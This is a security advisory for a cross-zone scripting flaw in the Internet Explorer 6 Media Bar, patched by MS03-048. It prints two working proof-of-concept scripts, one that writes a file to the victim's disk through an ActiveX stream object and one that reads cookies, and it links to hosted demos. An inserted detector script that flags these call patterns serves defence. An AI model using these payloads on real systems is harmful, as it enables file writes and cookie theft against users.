Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
BID:9769
Info
| Bugtraq ID: | 9769 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 11 2003 12:00AM |
| Updated: | Sep 11 2003 12:00AM |
| Credit: | Discovery of this issue is credited to jelmer. |
| Vulnerable: | Microsoft Internet Explorer 6.0 SP1; Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
It has been reported that Microsoft Internet Explorer may be prone to a cross-zone scripting vulnerability that could ultimately lead to execution of malicious script code and Active Content in the context of the My Computer Zone or a foreign domain. Reportedly, hostile code can be executed in the context of the Media Bar by passing '_media' as the target of the 'window.open' method. Cross-site scripting attacks are possible as well. This functionality is only available in Internet Explorer 6 and above.
This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities".
Exploit / POC
The following proof of concept has been supplied:
<script>
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_media');
</script>
Additional proof of concept for cross site scripting has been supplied as well:
<script>
window.open("http://www.google.com/","_media")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_media")
},5000);
</script>
Proof-of-concept demos are available at the following locations:
http://www.freewebs.com/applesoup/CrossMediaBar/demo.html
http://www.freewebs.com/applesoup/CrossMediaBar/CrossSite.htm
The original proof-of-concept is available at the following location:
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
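
A content-inspection check for the call pattern described in this advisory, as an added example that is not part of the original advisory: it reports `window.open` calls whose target is `_media` and rates them high when the URL literal begins with a `file:`, `javascript:` or `vbscript:` scheme. The function names, severity labels and sample markup are constructed; including `vbscript:` and matching `_media` case-insensitively are conservative assumptions beyond what the advisory shows.

```javascript
// Added example, not from the advisory. Function names and SAMPLE are constructed.
// Split the text following "window.open(" into top-level arguments,
// ignoring commas and brackets that sit inside string literals.
function splitArgs(text) {
  const args = [];
  let depth = 0, quote = null, cur = '';
  for (let i = 0; i < text.length; i++) {
    const c = text[i];
    if (quote) {
      cur += c;
      if (c === '\\') cur += (text[++i] || '');   // keep the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") { quote = c; cur += c; }
    else if ('([{'.includes(c)) { depth++; cur += c; }
    else if (')]}'.includes(c)) {
      if (depth === 0) { args.push(cur.trim()); return args; }
      depth--; cur += c;
    } else if (c === ',' && depth === 0) { args.push(cur.trim()); cur = ''; }
    else cur += c;
  }
  return null; // call never closed; nothing reliable to report
}

// Report every window.open() call whose target argument is the Media Bar.
function findMediaBarOpens(source) {
  const findings = [];
  const callRe = /\bwindow\s*\.\s*open\s*\(/g;
  while (callRe.exec(source) !== null) {
    const args = splitArgs(source.slice(callRe.lastIndex));
    if (!args || args.length < 2) continue;
    const [url, target] = args;
    if (!/^(['"])_media\1$/i.test(target)) continue;
    // The leading string literal of the URL expression fixes the scheme,
    // even when the rest is concatenated at run time.
    const lit = /^(['"])((?:\\.|(?!\1).)*)\1/.exec(url);
    const head = lit ? lit[2].trim().toLowerCase() : '';
    const scripted = /^(file|javascript|vbscript):/.test(head);
    findings.push({ url, severity: scripted ? 'high' : 'review' });
  }
  return findings;
}

// Constructed sample markup (not captured traffic).
const SAMPLE = [
  '<script>window.open("http://media.example/clip.htm", "_media");</script>',
  '<script>setTimeout(function(){ window.open("file:javascript:void(0)", "_media") }, 5000);</script>',
  '<script>window.open("help.html", "_blank", "width=300,height=200");</script>',
  '<a href="#" onclick="window.open(next, \'_MEDIA\')">play</a>',
].join('\n');
console.log(findMediaBarOpens(SAMPLE));
```

A `review` finding covers `_media` opens whose URL is a non-script scheme or cannot be resolved statically, such as a variable.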
Solution / Fix
Solution:
This issue has been addressed by Microsoft Security Bulletin MS03-048.
Microsoft Internet Explorer 6.0 SP1
- Microsoft Cumulative Security Update for Internet Explorer 6 Service Pack 1 (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-0E2B-46C9-B6C6-12DE03860465&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer 6 SP1 64-bit Edition (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-3629-4E0E-BF60-24845D2D20C9&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-8940-48E0-B163-3FCDCB558F21&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 64-bit Edition (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-0C48-4B65-989D-58B0CE1E6F95&displaylang=en
Microsoft Internet Explorer 6.0
- Microsoft Cumulative Security Update for Internet Explorer 6 (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-FBF7-4EA6-9CC2-27D104D4198E&displaylang=en
References
References:
- Microsoft Security Bulletin MS03-048 (Microsoft)
- Internet explorer 6 on windows XP allows exection of arbitrary code (jelmer)
- RE: New Internet Explorer Cross Zone/Site Scripting Vulnerability ("Thor Larholm")